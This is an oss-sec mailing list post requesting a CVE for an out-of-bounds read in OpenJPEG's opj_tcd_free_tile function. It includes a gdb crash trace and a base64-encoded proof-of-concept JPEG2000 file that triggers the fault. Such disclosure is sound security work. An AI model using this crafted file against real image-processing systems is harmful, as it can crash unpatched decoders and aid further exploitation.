oss-sec mailing list archives
CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function
From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:56 +0000
Hi all, I find a vulnerability of OpenJPEG. The specific flaw exists within the opj_tcd_free_tile function. A specially crafted JPEG2000 image file can force Out-Of-Bounds Read occurring in OpenJPEG. This issue can be reproduced in the latest version of OpenJPEG (https://github.com/uclouvain/openjpeg 2016.03.14). The detailed information about this issue can be described as follows. --------------------------------- winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q Reading symbols from opj_decompress...(no debugging symbols found)...done. (gdb) r -o image.pgm -i opj_tcd_free_tile.jp2 Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_opj_tcd_free_tile.jp2 [INFO] Start to read j2k main header (131). [INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No incltree created. [WARNING] tgt_create tree->numnodes == 0, no tree created. [WARNING] No imsbtree created. [INFO] Header of tile 1 / 1 has been read. [INFO] Tile 1/1 has been decoded. [INFO] Image data has been updated with tile 1. [INFO] Stream reached its end ! /home/winson/Desktop/repo/openjpeg/src/bin/jp2/convert.c:1765:imagetopnm precision 31 is larger than 16 : refused. [ERROR] Outfile image.pgm not generated Program received signal SIGSEGV, Segmentation fault. 0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 (gdb) bt #0 0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 #1 0xb7fc3ffa in opj_tcd_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 #2 0xb7fa6cea in opj_j2k_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 #3 0xb7fb4b38 in opj_jp2_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 #4 0xb7fb74ac in opj_destroy_codec () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7 #5 0x0804ca82 in main () (gdb) x /i $eip => 0xb7fc61ae <opj_tcd_free_tile+288>: mov 0x20(%eax),%eax (gdb) i r eax 0x40f72d11 1089940753 ecx 0x30 48 edx 0x362e88c5 909019333 ebx 0xb7fd6000 -1208131584 esp 0xbfff9e80 0xbfff9e80 ebp 0xbfff9ec8 0xbfff9ec8 esi 0x0 0 edi 0x0 0 eip 0xb7fc61ae 0xb7fc61ae <opj_tcd_free_tile+288> eflags 0x10293 [ CF AF SF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x /40xb $eax 0x40f72d11: Cannot access memory at address 0x40f72d11 (gdb) x /40xb $eax-0x20 0x40f72cf1: Cannot access memory at address 0x40f72cf1 The attachment is the proof-of-concept file. Alternatively, you can decode the following string using base64 and save the decoded content to a .jp2 file. --------------------------------- AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA AAQECxWeAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch 8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA 9VfWofCMnawpQPlngP/Z CREDIT: This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment:
oob_opj_tcd_free_tile.jp2
Description: oob_opj_tcd_free_tile.jp2
Current thread:
- CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function cve-assign (Mar 16)